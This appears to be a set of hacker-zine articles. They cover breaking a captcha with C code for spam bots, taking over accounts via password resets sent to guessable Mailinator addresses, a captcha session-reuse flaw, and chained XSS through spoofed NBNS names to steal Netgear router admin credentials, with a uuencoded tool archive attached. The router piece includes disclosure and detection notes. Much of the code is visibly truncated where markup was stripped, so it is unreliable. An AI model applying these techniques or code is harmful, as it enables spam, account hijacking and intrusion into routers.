i++; d=0; } } } } Ok, this piece of code will load an image into 'captcha', which is a 3 dimensional array (rows*cols*3 bytes per color). Once the array is loaded, using clear_noise () (written below) the noise will be removed. void clear_noise () { int i,d,k,t,ti,td; char n[3]; /* The borders are always white */ for (i=0;i<40;i++) for (k=0;k<3;k++) { captcha[i][0][k]=255; captcha[i][119][k]=255; } for (d=0;d<120;d++) for (k=0;k<3;k++) { captcha[0][d][k]=255; captcha[39][d][k]=255; } /* Starts removing the noise */ for (i=0;i<40;i++) for (d=0;d<120;d++) if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL && captcha[i][d][2]>__COL) for (k=0;k<3;k++) captcha[i][d][k]=255; for (i=1;i<39;i++) { for (d=1;d<119;d++) { for (k=0,t=0;k<3;k++) if (captcha[i][d][k]!=255) t=1; if (t) { ti=i-1; td=d-1; for (k=0,t=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td=d-1; ti=i; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td+=2; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td=d-1; ti=i+1; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; if (t/3<=__MIN) for (k=0;k<3;k++) captcha[i][d][k]=255; } } } } Well, what does this function do? It's really easy, first of all it clears all the borders (because we know by looking at the downloaded images that the borders never contain any character). Once the borders are cleaned, the second part of the routine will remove all the light blue pixels, turning them into white pixels. This way we'll obtain an almost perfect image. The only issue is that there are some pixels which are as dark as the ones which composes the characters, so we can't remove them with the method explained above, we'll have to create something new. My idea was to "delete" all the pixels which have no blue pixels near them, so that the few blue pixels which doesn't compose the letters will be deleted. In order to make the image cleaner I decided to delete all the pixels which doesn't have at least 3 pixels near them. You may have noticed that __COL and __MIN are not defined in the source above, these are two numbers: #define __COL 0x50 #define __MIN 4*3 __COL is a number I used when I delete all the light blue pixels, I use it in this line: if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL && captcha[i][d][2]>__COL) In a few words, if the pixel is lighter than #505050 then it will be deleted (turned white). __MIN is the minimum number of conterminous pixels under which the pixel is deleted. The values where obtained after a few attempts. Perfect, now we have a piece of code which loads and clears a captcha. Our next goal is to split the characters so that we'll be able to recognise each of them. Before doing all this work we'd better start working with 2 dimensional arrays, it'll make our work easier, so I've written some lines which makes this happen: void make_bw () { int i,d; for (i=0;i<40;i++) for (d=0;d<120;d++) if (captcha[i][d][0]!=255) bw[i][d]=1; else bw[i][d]=0; } This simply transforms the image in a black and white one, so that we can use a 2 dimensional array. Now we can proceed splitting the letters. In order to get the letters divided we are supposed to obtain two pixels whose coordinates are the ones of the upper left corner and the lower right corner. Once we have the coordinates of these two corners we'll be able to cut a rectangle which contains a character. Well, we're going to begin scanning the image from the left to the right, column by column, and every time we'll find a black pixels in a column which is preceded by an entire-white column, we'll know that in that column a new character begins, while when we'll find an entire-white column preceded by a column which contains at least one black pixel we'll know that a character ends there. Now, after this procedure is done we should have 12 different numbers which represents the columns where each character begins and ends. The next step is to find the rows where the letter begins and ends, so that we can obtain the coordinates of the pixels we need. Let's call the column where the Xth character begins CbX and the column where the Xth character ends CeX. Now we'll start our scan from the top to the bottom of the image to find the upper coordinate and from the bottom to the top to find the lower coordinate. This time, of course, the scan will be done six times using as limits the columns where each character is contained between. When the first row which contains a pixel is found (let's call this row RbX) the same thing will be done to find the lower coordinate. The only difference will be that the scan will begin from the bottom, that's done this way because some characters (such as the 'j') are divided into two parts, and if the scan was done only from the bottom to the end the result would have been just a dot instead of the whole letter. After having scanned the image from the bottom to the top we'll have another row where the letter ends (or begins from the bottom), we'll call this row ReX (of course we're talking about the Xth character). Now we know which are the horizontal and vertical coordinates of the two corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so we can procede by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain the Xth character. Obviously the matrix will be filled with the bits of the Xth character. void scan () { int i,d,k,j,c,coord[6][2][2]; for (d=0,j=0,c=0;d<120;d++) { for (i=0,k=0;i<40;i++) if (bw[i][d]) k=1; if (k && !j) { j=1; coord[c][0][0]=d; } else if (!k && j) { j=0; coord[c++][0][1]=d; } } for (c=0;c<6;c++) { coord[c][1][0]=-1; coord[c][1][1]=-1; for (i=0;(i<40 && coord[c][1][0]==-1);i++) for (d=coord[c][0][0];d=0 && coord[c][1][1]==-1);i--) for (d=coord[c][0][0];d I think there's nothing to be explained, it's just a few lines of code. After the script is runned and someone (me) enters all the data needed we're going to have a c/ directory with some subdirectories in which there are all the characters divided. Some characters ('a','e','i','o','u','l','0','1') never appear, which means that probably the author of the captcha decided not to include these characters. Anyway that's not a problem for us. Now, we should work out a way to make our program recognise a character. My idea was to divide the image in 4 parts (horizontally), and then count the number of black (1) pixels in each part, so that when we have an unknown character all our program will be supposed to do is to count the number of black pixels for each part of the image, and then search the character with the closest number of black pixels. I've tried to do it but I haven't kept into account that some characters (such as 'q' and 'p') have a similar number of pixels for each part, even though they're completely different. After having realised that, I decided to use 8 parts to divide each character: 4 parts horizontally, then each part is divided in other 2 parts vertically. Well, of course there's no way I could have done that by hand, and in fact I've written a PHP script: %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0], $x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]); } for ($i=0;$i It works out the average number of black pixels for each part. Moreover it also prints the average height of each character (I'm going to explain the reason of this below). A character such as a 'z' is divided this way: 01111 111110 11111 111111 11111 111111 01111 111111 00000 111110 00000 111110 00000 111100 00001 111100 00001 111000 00011 110000 00011 110000 00111 100000 00111 111110 01111 111111 01111 111111 00111 111110 So the numbers (of the black pixels) in this case will be: 18 23 1 18 8 8 14 22 Well, once taken all these numbers from each character the PHP script written above works out the average numbers for each character. In the 'z', for example, the average numbers are: 18 20 3 15 11 7 17 20 Which are really close to the ones written above (at least, they're closer than the ones of the other characters). Now the last step is to do the comparison between the character of the captcha we want our program to read and the numbers we've stored. To do so we first need to make the program count the number of black pixels of a character, and save the numbers somewhere so that it'll be possible to do the comparison. read_pixels ()'s aim is exactly to do that, using the same method used above in the PHP script. void read_pixels (int c) { int i,d,k,r; float arr[]={4,2,1.333333,1}; memset (bpix,0,8*sizeof(int)); for (k=0,i=0;k<4;k++) { for (;i<(int)(dim[c][0]/arr[k]);i++) { for (d=0;dn || min<0) { min=n; min_i = i; } } return ch_list[min_i]; } 'table' is an array in which all the average numbers worked out before are stored. As you can see there's a final number (n) which is the sum of a number obtain in this way: n += |x-y) Where 'x' is the number of black pixels of each part of the character we want to read, while 'y' is the average number of the character we're comparing the character we want to read with. The smaller the resulting number is, the closer to that character. I firstly thought that the algorithm I used would have been good enough, but I soon realised that there were too many "misunderstandings" while the program was trying to read some characters (such as the 'y's, which were usually read as 'v's). So I decided to make the final number also influenced by the height of the character, so that a 'v' and a 'y' (which have different heights) can't be misunderstood. Before this change the program couldn't recognise 17 characters out of 1200. Then, after some tests, I found that by adding the difference of the heights times a costant, the results were better: 3 wrong characters out of 1200. n = |x-y|*k Where 'x' is the height of the character we want to read while 'y' is the height of the character we're comparing the character we want to read with. The costant (k) was calculated by doing some attempts, and finally it was given the value 1.5. Now everything's ready, the last function I've written is read_captcha () which will return the captcha's string. char *read_captcha (char *file) { char *str; int i; str = malloc(7*sizeof(char)); load_image (file); clear_noise (); make_bw (); scan (); for (i=0;i<6;i++) str[i]=cmp(i); str[i]=0; return str; } And.. Done :) Now we can make our program read a captcha without any problem. Now I should be supposed to code an entire spam bot, but, since it requires some tests I think it wouldn't be good to post random comments all around phrack, so my article finishes here. #include #include #include #define __COL 80 #define __MIN 4*3 #define __HGT 1.5 unsigned char captcha[40][120][3]; unsigned char bw[40][120]; unsigned char chars[6][40][30]; int dim[6][2]; int bpix[4][2]; int heights[] = { 23, 16, 23, 23, 22, 23, 29, 23, 16, 16, 22, 22, 16, 16, 20, 16, 16, 16, 21, 16, 23, 24, 23, 23, 23, 23, 24, 24 }; char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789"; int table [28][2][4]= { { {18, 28, 26, 28}, { 0, 20, 25, 29}}, { {10, 17, 17, 10}, {21, 1, 1, 20}}, { { 0, 20, 25, 29}, {18, 31, 26, 31}}, { {10, 24, 18, 17}, {23, 12, 6, 5}}, { {21, 25, 20, 8}, {28, 25, 29, 27}}, { {18, 28, 25, 22}, { 0, 20, 25, 22}}, { { 1, 9, 0, 14}, {13, 27, 28, 25}}, { {18, 24, 30, 22}, { 0, 15, 21, 23}}, { {24, 21, 20, 17}, {21, 25, 24, 20}}, { {17, 18, 16, 14}, {20, 17, 16, 14}}, { {27, 25, 29, 22}, {24, 25, 25, 0}}, { {25, 25, 24, 0}, {27, 25, 29, 22}}, { {14, 16, 15, 13}, {19, 2, 0, 0}}, { {15, 16, 2, 9}, {12, 4, 18, 17}}, { {15, 20, 15, 12}, { 5, 10, 5, 19}}, { {13, 17, 15, 11}, {14, 14, 14, 10}}, { { 9, 17, 20, 13}, {12, 18, 22, 14}}, { { 9, 11, 11, 13}, {12, 13, 13, 12}}, { {15, 19, 14, 14}, {16, 20, 15, 9}}, { {18, 3, 11, 17}, {20, 15, 7, 20}}, { {21, 4, 8, 24}, {21, 26, 19, 24}}, { {16, 0, 6, 24}, {29, 23, 25, 28}}, { { 5, 12, 23, 5}, {23, 24, 32, 24}}, { {23, 25, 10, 20}, {18, 12, 26, 23}}, { { 3, 21, 28, 24}, {16, 15, 30, 27}}, { {18, 1, 11, 20}, {27, 24, 14, 3}}, { {25, 24, 26, 23}, {28, 26, 28, 28}}, { {20, 27, 16, 16}, {25, 26, 28, 9}} }; void clear () { int i,d,k; for (i=0;i<40;i++) for (d=0;d<120;d++) for (k=0;k<3;k++) captcha[i][d][k]=0; for (i=0;i<40;i++) for (d=0;d<120;d++) bw[i][d]=0; for (i=0;i<6;i++) for (d=0;d<40;d++) for (k=0;k<30;k++) chars[i][d][k]=0; for (i=0;i<6;i++) for (d=0;d<2;d++) dim[i][d]=0; } int numlen (int n) { char x[16]; sprintf (x,"%d",n); return strlen(x); } void load_image (char *img) { char line[1024]; int n,i,d,k,l,s; FILE *fp; fp = fopen (img, "r"); do fgets (line, sizeof(line),fp); while (strcmp (line, "255\n")); i=0; d=0; k=0; int cnt=0; while (i!=40) { fscanf (fp,"%d",&n); captcha[i][d][k]=(char)n; k++; if (k==3) { k=0; if (d<119) d++; else { i++; d=0; } } } } void clear_noise () { int i,d,k,t,ti,td; char n[3]; /* The borders are always white */ for (i=0;i<40;i++) for (k=0;k<3;k++) { captcha[i][0][k]=255; captcha[i][119][k]=255; } for (d=0;d<120;d++) for (k=0;k<3;k++) { captcha[0][d][k]=255; captcha[39][d][k]=255; } /* Starts removing the noise */ for (i=0;i<40;i++) for (d=0;d<120;d++) if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL && captcha[i][d][2]>__COL) for (k=0;k<3;k++) captcha[i][d][k]=255; for (i=1;i<39;i++) { for (d=1;d<119;d++) { for (k=0,t=0;k<3;k++) if (captcha[i][d][k]!=255) t=1; if (t) { ti=i-1; td=d-1; for (k=0,t=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td=d-1; ti=i; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td+=2; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td=d-1; ti=i+1; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; td++; for (k=0;k<3;k++) if (captcha[ti][td][k]!=255) t++; if (t<__MIN) for (k=0;k<3;k++) captcha[i][d][k]=255; } } } } void make_bw () { int i,d; for (i=0;i<40;i++) for (d=0;d<120;d++) if (captcha[i][d][0]!=255) bw[i][d]=1; else bw[i][d]=0; } void scan () { int i,d,k,j,c,coord[6][2][2]; for (d=0,j=0,c=0;d<120;d++) { for (i=0,k=0;i<40;i++) if (bw[i][d]) k=1; if (k && !j) { j=1; coord[c][0][0]=d; } else if (!k && j) { j=0; coord[c++][0][1]=d; } } for (c=0;c<6;c++) { coord[c][1][0]=-1; coord[c][1][1]=-1; for (i=0;(i<40 && coord[c][1][0]==-1);i++) for (d=coord[c][0][0];d=0 && coord[c][1][1]==-1);i--) for (d=coord[c][0][0];dn || min<0) { min=n; min_i = i; } } return ch_list[min_i]; } char *read_captcha (char *file) { char *str; int i; str = malloc(7*sizeof(char)); load_image (file); clear_noise (); make_bw (); scan (); for (i=0;i<6;i++) str[i]=cmp(i); str[i]=0; return str; } int main (int argc, char *argv[]) { printf ("%s\n",read_captcha ("test.ppm")); return 0; } Oh, if you want to have some fun and the staff is so kind as to leave captcha.php (now captcha_old.php) you can run this PHP script: I'm done, thanks for reading :)! darkjoker - darkjoker93 _at_ gmail.com |=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=| In this digital world of online banking, and cyber relationships there exists an epidemic. This is known simply as SPAM. The war on spam has been costly, with casualties on both sides. However finally mankind has developed the ultimate weapon to win the war... email anonymizers! Ok, so maybe this was a bit dramatic, but the truth is people are getting desperate to rid themselves of the gigantic volumes of unsolicited email which plagues their inbox daily. To combat this problem many internet users are turning to email anonymizing services such as Mailinator [1]. Sites like mailinator.com provide a domain where any keyword can be created and appended as the username portion of an email address. So for example, if you were to choose the username "trustno1", the email address trustno1@mailinator.com could be used. Then the mailbox can be accessed without a password at http://trustno1.mailinator.com. There is no registration required to do this, and the email address can be created at a whim. Obviously this can be used for a number of things. From a hackers perspective, it can be very useful to quickly create an anonymous email address whenever one is needed. Especially one which can be checked easily via a chain of proxies. Hell, combine it with an anonymous visa gift card, and you've practically got a new identity. For your typical spam adverse user, this can be an easy way to avoid dealing with spam. One of the easiest ways to quickly gain an inbox soaked in spam is to use your real email address to sign up to every shiney new website which tickles your fancy. By creating a mailinator account and submitting that instead, the user can visit the mailinator website to retrieve the sign up email. Since this is not the users regular email account, any spam sent to it is inconsequential. The flaw with this however, is that your typical user just isn't creative enough to work with a system designed this way. When creating a fresh anonymous email account for a new website a typical users thought process goes something like this: a) Look up at URL for name of site b) Append said name to mailinator domain c) ??? d) Profit This opens up a nice way for the internet's more shady characters to quickly gain access to almost any popular website via the commonly implemented "password reset" functionality. But wait, you say. Surely you jest? No one could be capable of such silly behavior on the internet! Alas... Apparenly Mike & Debra could. "An email with instructions on how to access Your Account has been sent to you at netflix@mailinator.com" "Netflix password request "Dear Mike & Debra, We understand you'd like to change your password. Just click here and follow the prompts. And don't forget your password is case sensitive." ;) ? At least security folk would be immune to this you say! There's no way that gmail@mailinator.com would allow one to reset 2600LA's mailing list password... As you can imagine it's easy to wile away some time with possible targets ranging from popular MMO's to banking websites. Just make sure you use a proxy so you don't have to phone them up and give them their password back... *cough* Have fun! ;) --DangerMouse P.S. With the rise in the popularity of social networking websites mailinator felt the need to go all web 2.0 by including a fancy list of people who "Like" mailinator on Facebook. AKA a handy target list for a bored individual with scripting skillz. References: [1] Mailinator: http://www.mailinator.com [2] Netflix: http://www.netflix.com |=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=| [ Or why we suck even more ;> ] Let's face it, our lazyness got us ;-) So what's the story behind our captcha? Ironically enough, the original script is coming from this URL: http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :))))))) 8<----------------------------------------------------------------------->8 generateCode($characters); /* font size will be 75% of the image height */ $font_size = $height * 0.75; $image = imagecreate($width, $height) or die('Cannot initialize new GD image stream'); /* set the colours */ $background_color = imagecolorallocate($image, 255, 255, 255); $text_color = imagecolorallocate($image, 20, 40, 100); $noise_color = imagecolorallocate($image, 100, 120, 180); /* generate random dots in background */ for( $i=0; $i<($width*$height)/3; $i++ ) { imagefilledellipse($image, mt_rand(0,$width), mt_rand(0,$height), 1, 1, $noise_color); } /* generate random lines in background */ for( $i=0; $i<($width*$height)/150; $i++ ) { imageline($image, mt_rand(0,$width), mt_rand(0,$height), mt_rand(0,$width), mt_rand(0,$height), $noise_color); } /* create textbox and add text */ $textbox = imagettfbbox($font_size, 0, $this->font, $code) or die('Error in imagettfbbox function'); $x = ($width - $textbox[4])/2; $y = ($height - $textbox[5])/2; imagettftext($image, $font_size, 0, $x, $y, $text_color, $this->font , $code) or die('Error in imagettftext function'); /* output captcha image to browser */ header('Content-Type: image/jpeg'); imagejpeg($image); imagedestroy($image); $_SESSION['security_code'] = $code; } } $width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120'; $height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40'; $characters = isset($_GET['characters']) && $_GET['characters']>2?$_GET['characters']:'6'; $captcha = new CaptchaSecurityImages($width,$height,$characters); ?> 8<----------------------------------------------------------------------->8 The reason why this particular script was chosen was lost in the mist of time so let's focus instead on the code: ----[ 1 - Oops OK so darkangel was right, the script is *really* poorly designed: -> The set of possible characters is limited to 28 characters -> The characters are inserted in the image using imagettfbbox() with (amongst other things) a fixed $font_size, a predictable position, etc. -> The noise itself is generated using lines and circles of the same color ($noise_color) which makes it trivial to remove. Ok so we knew that it was crappy but there is even more. darkjoker's approach can be seen as a dictionnary attack applied when the noise has been removed. There is much more simple: since the characters are not distorded, we can easily recover them using an OCR software. Luckily there exists a GNU one: gocr. We tested it against the imagettfbbox() function and without surprise ... it worked. Hey man, it wasn't worth to spend that much time :> ----[ 2 - Oops (bis) We located two interested things in the script and if you're a proficient PHP reader then you've probably noticed them too... ;-) a) The number of characters inserted in the image is user controlled. If an attacker calls http://phrack.org/captcha.php?characters=x then he can generate a captcha with X characters ( x >= 2 ). This shouldn't be an issue itself since captcha.php is called by the server. However it is because... b) The script includes an interesting line: $_SESSION['security_code'] = $code; This clearly means that the PHP session will only keep track of the *last* $code. While this is a normal behavior (some captcha aren't readable at all so the user must be allowed to refresh), this will be at our advantage. This gives us the opportunity to mount a new attack: -> I'm a spam bot and I'm writing some shit comment about how big & hard your penis will be when you will purchase my special pills. A PHP session is created. -> A captcha is loaded and because I'm a bot I can't fucking read it. Too bad for me. -> Within the same session I call captcha.php with ?characters=2. With a probability of 1/(28*28) I will be able to predict the code generated. I'll try as many times as required until I'm right. -> I will most likely succeed in the end and some poor desperate guy may purchase the pills. We've changed the captcha mechanism, the old one being captcha_old.php ----[ 3 - Conclusion Who knows if spammers are reading phrack? One thing is sure: the script is very present on Internet... Yes you should patch xD |=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=| --[ code is appended, but may not be the most recent. check: https://github.com/simon-weber/XSS-over-NBNS for the most recent version. ]-- --[ Contents 1 - Abstract 2 - Test Device Background 3 - Injection Chaining Technique 4 - Device Specific Exploits 4.1 - Steal Router Admin Credentials 4.2 - Hide a Device on the Network 5 - Tool 6 - Fix, Detection and Prevention 7 - Applications 8 - References --[ 1 - Abstract For routers which: 1) use NBNS to identify attached devices 2) list these devices on their web admin interface 3) do not sanitize the names they receive there exists a 15 character injection vector on the web interface. This vector can be exploited by anyone on the network, and will affect anyone who visits a specific page on the web administration interface. Using multiple injections in sequence separated with block comments, it is possible to chain these injections to create a payload of arbitrary length. This can be used to gain router admin credentials, steal cookies from an admin, alter the view of attached devices, or perform any other XSS attack. The real world application of the technique is limited by how often admins are on the web interface. However, coupled with some social engineering, small businesses such as coffee shops may be vulnerable. --[ 2 - Test Device Background I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a common home wireless B/G router. Originally released in 2004, its EOL was about 5 years ago [1]. The web admin interface is pretty poorly built (sorry, Netgear!). If you poke around, you'll find a lot of unescaped input fields to play with. However, none of them can really be used to do anything interesting - they're one time injection vectors that other users won't see. However, there is one interesting page. This is the "attached devices" page (DEV_devices.htm). It shows a table of what's connected to the router, and looks something like this: # Name IP MAC 1 computer_1 192.168.1.2 07:E0:17:8F:11:2F 2 computer_2 192.168.1.11 AF:3C:07:4D:B0:3A 3 -- 192.168.1.15 EB:3C:76:0F:67:43 This table is generated from the routing table, and the name is filled in from NBNS responses to router requests. If a machine doesn't respond to NBNS, takes too long to respond, or it gives an invalid name (over 15 characters or improperly terminated), the name is set to "--". The table is refreshed in two ways: automatically by the router at an interval, and by a user visiting or refreshing the page. A quick test showed that the name in this table was unescaped. However, this only gets us 15 characters of payload. I couldn't manage to squeeze a reference to external code in just 15 characters (maybe someone else can?). Executing arbitrary code will require something a bit more sophisticated. --[ 3 - Injection Chaining Technique The obvious way to get more characters for the payload is by chaining together multiple injections. To do this, we need a few things: 1) A way to make multiple entries in the table: This is easy, we just send out fake responses for IP/MAC combinations that don't already exist on the network. 2) A way to control the order of our entries: Also easy: the table orders by IP address. We'll just use a range of incremental addresses that no one else is using. 3) A way to chain our entries around the other html: Block comments will work for this. Our injections will just open and close block comments at the end and beginning of their reported names. For an illustration, imagine anything between <> will be ignored on the page, and our name injections are delimited with single quotes: '[name 1] <' [ignored stuff] [ignored stuff] '> [name 2] <' [ignored stuff] ... '> [name 3] <' ... Great, that was easy. What kind of block comments can we use? How about html's?. This could work, but it has limitations. First off, -- or > anywhere in the commented out html will break things. Even if this did work, we'd have to be careful about where we split things, and the comments would take up about half of a 15 char name. Javascript's c-style block comments are smaller and more flexible. They can come anywhere in code, so long as it isn't the middle of a token. For example, document/* ignored */.write("something") is fine, while docu/* uh oh */ment.write("something") breaks things. We also just need to avoid */ in the commented out html, which should be much less likely to pop up than >. To use javascript block comments, we'll obviously need to use javascript to get our payload onto the page. Call it our "payload transporter". This will work just fine: "" So, then, the first thing to do is fit our transporter into 15 char chunks to send as our first few fake NBNS names. Being careful not to split tokens with comments, our first 3 names can be: ' onto the page: Spoofed NBNS Name IP MAC 192.168.1.119 00:00:00:00:00:09 There are a few other practical considerations that I found while working with my specific Netgear router. It will use the most recent information it has for device names. This means that we have to send our payload every time that requests are sent out. It also means that for some time after we stop injecting, the device listing is going to have a number of '--' entries; the router is expecting to get names for these devices but sees no response. To hide our tracks, we could reboot the router when finished (this is possible by either injection or after stealing admin credentials, which is detailed below). We also have to be careful that a legitimate device doesn't come on to the network with one of our spoofed IPs or MACs. This could possibly break our injection, depending on the timing of responses. One last thing to keep in mind: the NBNS packets need to get on the wire quickly, since the router only listens for NBNS responses for a short time. Thus, smaller payloads (which fit into less packets) are more likely to succeed. You'll want to create external javascript to do any heavy lifting, and just inject code to run it. When a payload fails, earlier packets will get there and others won't, leaving garbage in the attached devices list. --[ 4 - Device Specific Exploits Naturally, anything that can be done with XSS or javascript is fair game. You can attack the user (cookie stealing), the router (injected requests to the web interface are now authed), or the page itself. I created a few interesting examples that are specific to the Netgear device I had. ------[ 4.1 - Steal Router Admin Credentials On the admin interface, there is an option to backup and restore the router settings. It generates a simple flat file database called netgear.cfg. This file itself is actually rather interesting. It seems to be a plaintext memory dump, guarded from manipulation by a checksum that I couldn't figure out (no one has cracked it as of the time this was written - if you do, let me know). In it, you'll find everything from wireless keys to static routes to - surprise - plaintext administrator information. This includes usernames and passwords for both the http admin and telnet super admin (see [3] for information on the hidden telnet console). It's easy to steal this file via XSS in the same way that cookies are stolen. The attacker first sets up a listening http server to receive the information. Then, the injection code simply GETs the file and sends it off to the listening server. With admin access to the router, the attacker can do all sorts of things. Basic traffic logging is built-in, and can even be emailed out automatically. DoS is possible through the router's website blocking functions. Man in the middle attacks are possible through the exposed dhcp dns, static routing and internet connection configuration options. ------[ 4.2 - Hide a Device on the Network The only place that an admin can get information about who is on the network is right on the page we inject to. Manipulating the way the device list is displayed could provide simple counter-detection against a suspicious administrator. For this exploit, we inject javascript to iterate through the table and remove any row that matches a device we're interested in. Then, the table is renumbered. Note that we don't have to own the device to remove it from the list. Going one step further, the attacker can bolster the cloak of invisibility. Blocking connections not originating from the router is an obvious choice. It might be wise to block pings directly from the router as well. --[ 5 - Tool I used Scapy with Python to implement the technique and exploits described above and hosted it on Github [2]. You can also specify a custom exploit that will be packaged and sent using my chaining technique. I also made a simple python http server to listen for stolen admin credentials and serve up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof; I reused some of his code [4]. To combat the problem I described earlier about sending packets quickly, I listen for the first request from the router and precompute the response packets to send. These will be sent as responses to any other requests sniffed. You'll notice this if you use my tool; a "ready to inject" message will be printed after the responses are generated. If you look at my built-in exploits, you'll see they each use a loadhelp2 function as the entry point. This is just an easy way to get them to run when the page is loaded. The router declares the loadhelp function externally, and runs it on page load; I declare it on the page (so my version is actually used), and use it to launch my external loadhelp2 code. Then, the original code is patched on to the end, so the user doesn't notice. --[ 6 - Fix, Detection and Prevention To close the hole, Netgear would only need to change some web backend code in the firmware to escape NBNS names. I contacted Netgear about this. They won't make a fix for this specific model - it already saw its support EOL - but they are checking their newer models for this flaw as of September 2011 [1]. So, if you have this router, know that a fix isn't coming. While it may be difficult to initially detect that a device you own is being attacked, once you suspect it there are simple ways to verify it: check the source of the affected page; you'll see the commented out device entries with suspicious names use the hidden telnet interface. This will show the many fake IPs that are generated when packing a payload. as a last resort, watch network traffic for malformed NBNS names Also, keep in mind that you can only be affected when checking your router's configuration. You could protect yourself completely by never visiting the web administration interface. --[ 7 - Applications Of course, this technique's practical application is limited to how often users check their router admin pages. However, when coupled with some social engineering, I could imagine a vulnerability for small businesses like coffee shops. These locations commonly offer wireless using off-the-shelf hardware like my Netgear router. Getting on their network is easy - it's already open. At this point, the attacker starts the exploit, then convinces an employee to check the admin pages (maybe "I'm having some strange issues with the wireless...Can you check on the router and see if my device is showing up?"). I'm sure a practiced social engineer would have no trouble pulling this off. As far as applying this beyond the home networking realm, a good place to start would be investigating this technique on other routers or better firmwares like DD-WRT or Tomato. That would at least determine if this is a common flaw. I didn't have another device to play with (the wgr614v5 doesn't work with other firmware), so I'll leave it for someone else to try. I'm doubtful that other applications very different from what I described exist. Router administration pages simply aren't viewed very much. However, the broader idea of XSS through spoofed NBNS names might be applicable to a different domain. Anywhere there is a listing of NBNS names, there is the possibility of an injection vector. --[ 8 - References [1] private communication with Netgear, September 2011 [2] https://github.com/simon-weber/XSS-over-NBNS [3] http://www.seattlewireless.net/NetgearWGR614#TelnetConsole [4] http://www.mcgrewsecurity.com/tools/nbnspoof/ October 2011 Simon Weber sweb090 _at_ gmail.com begin 644 xss_over_nbns.tgz M'XL(`(D#G4X``^P\^W/;1L[]67_%'CWWD4HI2G)BIZ=8GKJ)TWJ:.J[MS-V- MJ]&LR)7%A"(9/BRK^?*_'X!]\"'YD;NV]SU.T];2/@`L%L`"6&S])!#]KW[? MSP`^S_?VZ"]\VG_I^W"X_^SY[F"X^W3_J\%P\.SYX"NV]SO319\R+WC&V%=9 MDA3WC7NH_W_IQ\?]CV=Q/@WC]\(ODLQ+U[\Q#MS@_6?/[MC_X=/=_6%K_Y\^ M'^Q^Q0:_,1U;/__/]W_G3_TRS_JS,.Z+^(:EZV*1Q)V=S@YK"\6(G7YW>L%D M2YC$;)D$9238/,E8F0O&KWD8YP4[%<6U`):NKK/]X;.;/0#U,DG767B]*)CS MLLM@EX?L(EP"B+^*F+WD8>7ZR/*1)@6!I.8O"?"$"5L8! M#/W^[,W-[@N6"\'>G+P\/KTX9O,P$D3PRTP$8<&*A)TG`+8`Z'DDUNPG__M, MK(A.7%.:)'-8#G,&3WN[SWN[8)NZ+]@)KB%@>;(4+)FS19@S5`T/X/X`W\,8 MIB\YKGL$32N"_.W2OP;(N?#++"S62#CT+8HB'?7[6_HZ.Q=EFF8BSUFQ$.SD M[&:?Q0G+DK(0;,6S.(RO1WI^(?R%=YL7(O-B4?2+,,W[N9K>RWV>KGMA>K/? M4_/ZG7"9)K#H*+F^AM\=]=>[%L4;^"HRQZ)97E;&1;@45M?+H4O=SN=>98LF1S-HX@IR$\Z'3_B0/R)$HI1AS&V\WTB$TK$/Y+##_A/;_04[ M:Q_[23](_'(IXL*[HW\%6R@8M<(`\[T^0._R6#.@WJEX M")WJ6Z>!7"Y\K#A0[]*,&&N6-":"/J5)G(,,C]EI$@NSA:`GM'N&\WDD+G&*6FP/3Q7C@IEDL)P'?IU(G*FG!WU.U9"4Q MF?A8BKPPHK!M_V$!60B$)W.E97IW0U!:DMF&0H)A7!1+Z`F+14UWC.R%4![C9^5$0=HU4# MU@&#<(E`7@Z&#TZQCV52"+3S=99Y<(2P6`CB79`P,CXP`0A?"1OU*H'9V#D# M0&4&:A$'U(+6"886&?PBJ`TTFAD;\@[2F$8@4(YE6RZS?OG%MKH=0_Q?:4M; M)*K.*/$!S$#]6BW@4*2V`Q:)V-%"Q'KL>8V[FH,PTWK2MRWVM09[!7-'\._7 MWTR@T;+=_A/KG]T5(SBUK]T*&%+Y]9A]LWV9<.`43,J*(V+@L<`C$ZQ]&"&C MX5A=\KRKN?#`@N1:NB^JQ?P6*^G41+L`NNX2;3PQ_FG1K@!W&S^ZE2:2]AJH MQKA4!D>9EO1#4;0EZ7.[INOA'%A?X'0T8A%?@T^!+N'/ MI;H^POV7VQP^PWX_K71'Q$*[-MK'N7ZU!#P=O33\?3R_'1Z\JJ+4C"RW&HH`"'8M=D&@/5S M?62+HFK4>7V4:KLX?SDB$:QS[.0,'*_,1QK8JXO+[0,"V/+'D6?CPD:6K:#\ M_.[XXO+D[>D4FZ'-MNR'B7\$#*.6 MC,"G9F_/V2P#!?1!D8V>YHNDC()IIH`U=WW+ 